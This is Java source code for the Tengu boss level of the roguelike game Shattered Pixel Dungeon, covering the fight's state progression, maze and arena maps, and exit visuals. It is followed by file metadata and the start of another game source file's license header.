if (pos == ARENA_CENTER) return randomTenguArenaCell();
else return pos;
}
@Override
public void occupyCell( Char ch ) {
super.occupyCell( ch );
if (ch == Dungeon.hero){
//hero enters tengu's chamber
if (state == State.START
&& (new EmptyRoom().set(2, 25, 8, 32)).inside(cellToPoint(ch.pos))){
progress();
}
//hero finishes the maze
else if (state == State.MAZE
&& (new EmptyRoom().set(4, 0, 7, 4)).inside(cellToPoint(ch.pos))){
progress();
}
}
}
@Override
public int randomRespawnCell() {
int pos = 5+2*32; //random cell adjacent to the entrance.
int cell;
do {
cell = pos + PathFinder.NEIGHBOURS8[Random.Int(8)];
} while (!passable[cell] || Actor.findChar(cell) != null);
return cell;
}
@Override
public String tileName( int tile ) {
switch (tile) {
case Terrain.WATER:
return Messages.get(PrisonLevel.class, "water_name");
default:
return super.tileName( tile );
}
}
@Override
public String tileDesc(int tile) {
switch (tile) {
case Terrain.EMPTY_DECO:
return Messages.get(PrisonLevel.class, "empty_deco_desc");
case Terrain.BOOKSHELF:
return Messages.get(PrisonLevel.class, "bookshelf_desc");
default:
return super.tileDesc( tile );
}
}
private void resetTraps(){
traps.clear();
for (int i = 0; i < length(); i++){
if (map[i] == Terrain.INACTIVE_TRAP) {
Trap t = new GrippingTrap().reveal();
t.active = false;
setTrap(t, i);
map[i] = Terrain.INACTIVE_TRAP;
}
}
}
private void changeMap(int[] map){
this.map = map.clone();
buildFlagMaps();
cleanWalls();
exit = entrance = 0;
for (int i = 0; i < length(); i ++)
if (map[i] == Terrain.ENTRANCE)
entrance = i;
else if (map[i] == Terrain.EXIT)
exit = i;
BArray.setFalse(visited);
BArray.setFalse(mapped);
for (Blob blob: blobs.values()){
blob.fullyClear();
}
addVisuals(); //this also resets existing visuals
resetTraps();
GameScene.resetMap();
Dungeon.observe();
}
private void clearEntities(Room safeArea){
for (Heap heap : heaps.valueList()){
if (safeArea == null || !safeArea.inside(cellToPoint(heap.pos))){
storedItems.addAll(heap.items);
heap.destroy();
}
}
for (HeavyBoomerang.CircleBack b : Dungeon.hero.buffs(HeavyBoomerang.CircleBack.class)){
if (safeArea == null || !safeArea.inside(cellToPoint(b.returnPos()))){
storedItems.add(b.cancel());
}
}
for (Mob mob : Dungeon.level.mobs.toArray(new Mob[0])){
if (mob != tengu && (safeArea == null || !safeArea.inside(cellToPoint(mob.pos)))){
mob.destroy();
if (mob.sprite != null)
mob.sprite.killAndErase();
}
}
for (Plant plant : plants.valueList()){
if (safeArea == null || !safeArea.inside(cellToPoint(plant.pos))){
plants.remove(plant.pos);
}
}
}
public void progress(){
switch (state){
//moving to the beginning of the fight
case START:
//if something is occupying Tengu's space, wait and do nothing.
if (Actor.findChar(ARENA_CENTER) != null){
return;
}
seal();
set(ARENA_DOOR, Terrain.LOCKED_DOOR);
GameScene.updateMap(ARENA_DOOR);
for (Mob m : mobs){
//bring the first ally with you
if (m.alignment == Char.Alignment.ALLY && !m.properties().contains(Char.Property.IMMOVABLE)){
m.pos = ARENA_DOOR; //they should immediately walk out of the door
m.sprite.place(m.pos);
break;
}
}
tengu.state = tengu.HUNTING;
tengu.pos = ARENA_CENTER; //in the middle of the fight room
GameScene.add( tengu );
tengu.notice();
state = State.FIGHT_START;
break;
//halfway through, move to the maze
case FIGHT_START:
changeMap(MAP_MAZE);
clearEntities((Room) new EmptyRoom().set(0, 5, 8, 32)); //clear the entrance
Actor.remove(tengu);
mobs.remove(tengu);
TargetHealthIndicator.instance.target(null);
tengu.sprite.kill();
Room maze = new MazeRoom();
maze.set(10, 1, 31, 29);
maze.connected.put(null, new Room.Door(10, 2));
maze.connected.put(maze, new Room.Door(20, 29));
maze.paint(this);
buildFlagMaps();
cleanWalls();
GameScene.resetMap();
GameScene.flash(0xFFFFFF);
Sample.INSTANCE.play(Assets.SND_BLAST);
state = State.MAZE;
break;
//maze beaten, moving to the arena
case MAZE:
Dungeon.hero.interrupt();
Dungeon.hero.pos += 9+3*32;
Dungeon.hero.sprite.interruptMotion();
Dungeon.hero.sprite.place(Dungeon.hero.pos);
changeMap(MAP_ARENA);
clearEntities( (Room) new EmptyRoom().set(0, 0, 10, 4)); //clear all but the area right around the teleport spot
//if any allies are left over, move them along the same way as the hero
for (Mob m : mobs){
if (m.alignment == Char.Alignment.ALLY) {
m.pos += 9 + 3 * 32;
m.sprite().place(m.pos);
}
}
tengu.state = tengu.HUNTING;
do {
tengu.pos = Random.Int(length());
} while (solid[tengu.pos] || distance(tengu.pos, Dungeon.hero.pos) < 8);
GameScene.add(tengu);
tengu.notice();
GameScene.flash(0xFFFFFF);
Sample.INSTANCE.play(Assets.SND_BLAST);
state = State.FIGHT_ARENA;
break;
//arena ended, fight over.
case FIGHT_ARENA:
unseal();
CustomTilemap vis = new exitVisual();
vis.pos(11, 8);
customTiles.add(vis);
((GameScene)ShatteredPixelDungeon.scene()).addCustomTile(vis);
vis = new exitVisualWalls();
vis.pos(11, 8);
customWalls.add(vis);
((GameScene)ShatteredPixelDungeon.scene()).addCustomWall(vis);
Dungeon.hero.interrupt();
Dungeon.hero.pos = 5+27*32;
Dungeon.hero.sprite.interruptMotion();
Dungeon.hero.sprite.place(Dungeon.hero.pos);
tengu.pos = ARENA_CENTER;
tengu.sprite.place(ARENA_CENTER);
//remove all mobs, but preserve allies
ArrayList<Mob> allies = new ArrayList<>();
for(Mob m : mobs.toArray(new Mob[0])){
if (m.alignment == Char.Alignment.ALLY && !m.properties().contains(Char.Property.IMMOVABLE)){
allies.add(m);
mobs.remove(m);
}
}
changeMap(MAP_END);
for (Mob m : allies){
do{
m.pos = randomTenguArenaCell();
} while (findMob(m.pos) != null);
if (m.sprite != null) m.sprite.place(m.pos);
mobs.add(m);
}
tengu.die(Dungeon.hero);
clearEntities((Room) new EmptyRoom().set(2, 25, 8, 31)); //arena is safe
for (Item item : storedItems)
drop(item, randomTenguArenaCell());
GameScene.flash(0xFFFFFF);
Sample.INSTANCE.play(Assets.SND_BLAST);
state = State.WON;
break;
}
}
@Override
public Group addVisuals() {
super.addVisuals();
PrisonLevel.addPrisonVisuals(this, visuals);
return visuals;
}
private static final int W = Terrain.WALL;
private static final int D = Terrain.DOOR;
private static final int L = Terrain.LOCKED_DOOR;
private static final int e = Terrain.EMPTY;
private static final int T = Terrain.INACTIVE_TRAP;
private static final int E = Terrain.ENTRANCE;
private static final int X = Terrain.EXIT;
private static final int M = Terrain.WALL_DECO;
private static final int P = Terrain.PEDESTAL;
//TODO if I ever need to store more static maps I should externalize them instead of hard-coding
//Especially as I means I won't be limited to legal identifiers
private static final int[] MAP_START =
{ W, W, W, W, W, M, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, W, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, W, e, E, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, W, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, W, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, W, W, D, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, W, W, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, M, W, W, e, W, W, M, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, e, e, e, W, e, W, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, e, e, e, D, e, D, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, e, e, e, W, e, W, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, M, W, W, e, W, W, M, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, e, e, e, W, e, W, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, e, e, e, D, e, D, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, e, e, e, W, e, W, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, M, W, W, e, W, W, M, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, e, e, e, W, e, W, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, e, e, e, D, e, D, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, e, e, e, W, e, W, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, M, W, W, e, W, W, M, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, e, e, e, W, e, W, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, e, e, e, D, e, D, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, e, e, e, W, e, W, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, M, W, W, e, W, W, M, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, W, W, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, M, W, L, W, M, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, T, T, T, T, T, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, T, T, T, T, T, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, T, T, T, T, T, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, T, T, T, T, T, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, T, T, T, T, T, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W};
private static final int[] MAP_MAZE =
{ W, W, W, W, W, M, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, W, e, e, e, W, W, M, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, e, D, e, e, e, D, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, W,
W, W, W, W, e, e, e, W, W, W, W, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, W,
W, W, W, W, W, W, W, W, W, W, W, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, W,
W, W, W, W, W, e, W, W, W, W, W, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, W,
W, W, W, W, W, D, W, W, W, W, W, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, W,
W, W, M, W, W, e, W, W, M, W, W, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, W,
W, e, e, e, W, e, W, e, e, e, W, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, W,
W, e, e, e, D, e, D, e, e, e, W, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, W,
W, e, e, e, W, e, W, e, e, e, W, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, W,
W, W, M, W, W, e, W, W, M, W, W, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, W,
W, e, e, e, W, e, W, e, e, e, W, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, W,
W, e, e, e, D, e, D, e, e, e, W, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, W,
W, e, e, e, W, e, W, e, e, e, W, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, W,
W, W, M, W, W, e, W, W, M, W, W, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, W,
W, e, e, e, W, e, W, e, e, e, W, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, W,
W, e, e, e, D, e, D, e, e, e, W, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, W,
W, e, e, e, W, e, W, e, e, e, W, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, W,
W, W, M, W, W, e, W, W, M, W, W, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, W,
W, e, e, e, W, e, W, e, e, e, W, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, W,
W, e, e, e, D, e, D, e, e, e, W, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, W,
W, e, e, e, W, e, W, e, e, e, W, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, W,
W, W, W, W, W, e, W, W, W, e, W, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, W,
W, W, W, W, W, e, W, W, W, e, W, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, W,
W, W, W, M, W, D, W, M, W, e, W, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, W,
W, W, W, T, T, T, T, T, W, e, W, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, W,
W, W, W, T, T, T, T, T, W, e, W, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, W,
W, W, W, T, T, T, T, T, W, e, W, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, W,
W, W, W, T, T, T, T, T, W, e, W, W, W, W, W, W, W, W, W, W, e, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, T, T, T, T, T, W, e, e, e, e, e, e, e, e, e, e, e, e, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W};
private static final int[] MAP_ARENA =
{ W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, W, W, W, W, W,
W, W, e, e, e, e, e, e, e, e, e, e, e, W, W, W, e, e, e, e, e, e, e, e, e, e, e, W, W, W, W, W,
W, e, e, e, e, e, W, e, e, e, e, e, W, W, M, W, W, e, e, e, e, e, W, e, e, e, e, e, W, W, W, W,
W, e, e, e, e, e, W, e, e, e, e, W, W, e, e, e, W, W, e, e, e, e, W, e, e, e, e, e, W, W, W, W,
W, e, e, e, e, W, W, e, e, e, e, e, D, e, e, e, D, e, e, e, e, e, W, W, e, e, e, e, W, W, W, W,
W, e, e, W, W, W, M, e, e, e, e, W, W, e, e, e, W, W, e, e, e, e, M, W, W, W, e, e, W, W, W, W,
W, e, e, e, e, e, e, e, e, e, e, e, W, W, W, W, W, e, e, e, e, e, e, e, e, e, e, e, W, W, W, W,
W, e, e, e, e, e, e, e, e, e, e, e, e, W, W, W, e, e, e, e, e, e, e, e, e, e, e, e, W, W, W, W,
W, e, e, e, e, e, e, e, e, e, W, e, e, e, e, e, e, e, W, e, e, e, e, e, e, e, e, e, W, W, W, W,
W, e, e, e, e, e, e, e, e, W, W, e, e, e, e, e, e, e, W, W, e, e, e, e, e, e, e, e, W, W, W, W,
W, e, e, e, W, e, W, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, e, W, e, e, e, W, W, W, W,
W, e, e, W, W, D, W, W, e, e, e, e, W, e, e, e, W, e, e, e, e, W, W, D, W, W, e, e, W, W, W, W,
W, e, W, W, e, e, e, W, W, e, e, e, e, e, e, e, e, e, e, e, W, W, e, e, e, W, W, e, W, W, W, W,
W, e, W, W, e, e, e, W, W, e, e, e, e, e, M, e, e, e, e, e, W, W, e, e, e, W, W, e, W, W, W, W,
W, e, W, W, e, e, e, W, W, e, e, e, e, e, e, e, e, e, e, e, W, W, e, e, e, W, W, e, W, W, W, W,
W, e, e, W, W, D, W, W, e, e, e, e, W, e, e, e, W, e, e, e, e, W, W, D, W, W, e, e, W, W, W, W,
W, e, e, e, W, e, W, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, e, W, e, e, e, W, W, W, W,
W, e, e, e, e, e, e, e, e, W, W, e, e, e, e, e, e, e, W, W, e, e, e, e, e, e, e, e, W, W, W, W,
W, e, e, e, e, e, e, e, e, e, W, e, e, e, e, e, e, e, W, e, e, e, e, e, e, e, e, e, W, W, W, W,
W, e, e, e, e, e, e, e, e, e, e, e, e, W, W, W, e, e, e, e, e, e, e, e, e, e, e, e, W, W, W, W,
W, e, e, e, e, e, e, e, e, e, e, e, W, W, M, W, W, e, e, e, e, e, e, e, e, e, e, e, W, W, W, W,
W, e, e, W, W, W, W, e, e, e, e, W, W, e, e, e, W, W, e, e, e, e, W, W, W, W, e, e, W, W, W, W,
W, e, e, e, e, M, W, e, e, e, e, e, D, e, e, e, D, e, e, e, e, e, W, M, e, e, e, e, W, W, W, W,
W, e, e, e, e, e, W, e, e, e, e, W, W, e, e, e, W, W, e, e, e, e, W, e, e, e, e, e, W, W, W, W,
W, e, e, e, e, e, W, e, e, e, e, e, W, W, W, W, W, e, e, e, e, e, W, e, e, e, e, e, W, W, W, W,
W, W, e, e, e, e, e, e, e, e, e, e, e, W, W, W, e, e, e, e, e, e, e, e, e, e, e, W, W, W, W, W,
W, W, W, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, e, W, W, W, W, W, W,
W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W};
private static final int[] MAP_END =
{ W, W, W, W, W, M, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, W, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, W, e, E, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, W, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, W, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, W, W, D, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, W, W, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, M, W, W, e, W, W, M, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, e, e, e, W, e, W, e, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, e, e, e, D, e, D, e, e, e, e, e, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, e, e, e, W, e, W, e, e, e, e, e, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, M, W, W, e, W, W, M, e, W, e, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, e, e, e, W, e, W, e, e, e, e, e, e, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, e, e, e, D, e, D, e, e, e, e, e, e, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, e, e, e, W, e, W, e, e, e, W, e, e, e, e, e, e, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, M, W, W, e, W, W, e, e, e, e, e, e, e, e, e, e, e, e, e, X, W, W, W, W, W, W, W, W, W, W,
W, e, e, e, W, e, W, e, e, e, W, e, e, e, e, e, e, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W,
W, e, e, e, D, e, D, e, e, e, W, e, e, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, e, e, e, W, e, W, e, e, e, e, e, e, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, M, W, W, e, W, W, e, W, e, e, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, e, e, e, W, e, W, e, e, e, W, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, e, e, e, D, e, D, e, e, e, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, e, e, e, W, e, W, e, e, e, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, W, W, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, W, W, e, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, M, W, D, W, M, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, T, T, T, T, T, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, T, T, T, T, T, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, T, T, P, T, T, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, T, T, T, T, T, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, T, T, T, T, T, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W,
W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W, W};
public static class exitVisual extends CustomTilemap {
{
texture = Assets.PRISON_EXIT_OLD;
tileW = 12;
tileH = 14;
}
final int TEX_WIDTH = 256;
private static short[] render = new short[]{
0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0,
0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0,
0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0,
0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0,
0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
};
@Override
public Tilemap create() {
Tilemap v = super.create();
int[] data = mapSimpleImage(0, 0, TEX_WIDTH);
for (int i = 0; i < data.length; i++){
if (render[i] == 0) data[i] = -1;
}
v.map(data, tileW);
return v;
}
}
public static class exitVisualWalls extends CustomTilemap {
{
texture = Assets.PRISON_EXIT_OLD;
tileW = 12;
tileH = 14;
}
final int TEX_WIDTH = 256;
private static short[] render = new short[]{
0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1,
0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0,
0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0,
0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0,
0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0,
};
@Override
public Tilemap create() {
Tilemap v = super.create();
int[] data = mapSimpleImage(4, 0, TEX_WIDTH);
for (int i = 0; i < data.length; i++){
if (render[i] == 0) data[i] = -1;
}
v.map(data, tileW);
return v;
}
}
}
| 28,155 | OldPrisonBossLevel | java | en | java | code | {"qsc_code_num_words": 6210, "qsc_code_num_chars": 28155.0, "qsc_code_mean_word_length": 2.24090177, "qsc_code_frac_words_unique": 0.07004831, "qsc_code_frac_chars_top_2grams": 0.30612245, "qsc_code_frac_chars_top_3grams": 0.41412762, "qsc_code_frac_chars_top_4grams": 0.51192872, "qsc_code_frac_chars_dupe_5grams": 0.53794194, "qsc_code_frac_chars_dupe_6grams": 0.47240586, "qsc_code_frac_chars_dupe_7grams": 0.40528888, "qsc_code_frac_chars_dupe_8grams": 0.39623455, "qsc_code_frac_chars_dupe_9grams": 0.39594711, "qsc_code_frac_chars_dupe_10grams": 0.39594711, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02544895, "qsc_code_frac_chars_whitespace": 0.28403481, "qsc_code_size_file_byte": 28155.0, "qsc_code_num_lines": 699.0, "qsc_code_num_chars_line_max": 118.0, "qsc_code_num_chars_line_mean": 40.27896996, "qsc_code_frac_chars_alphabet": 0.66489731, "qsc_code_frac_chars_comments": 0.07380572, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.36909091, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.00230088, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00153392, "qsc_code_frac_lines_prompt_comments": 0.00143062, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.04, "qsc_codejava_score_lines_no_logic": 0.12181818, "qsc_codejava_frac_words_no_modifier": 0.95652174, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 1, "qsc_code_frac_chars_top_3grams": 1, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/levels/SewerLevel.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
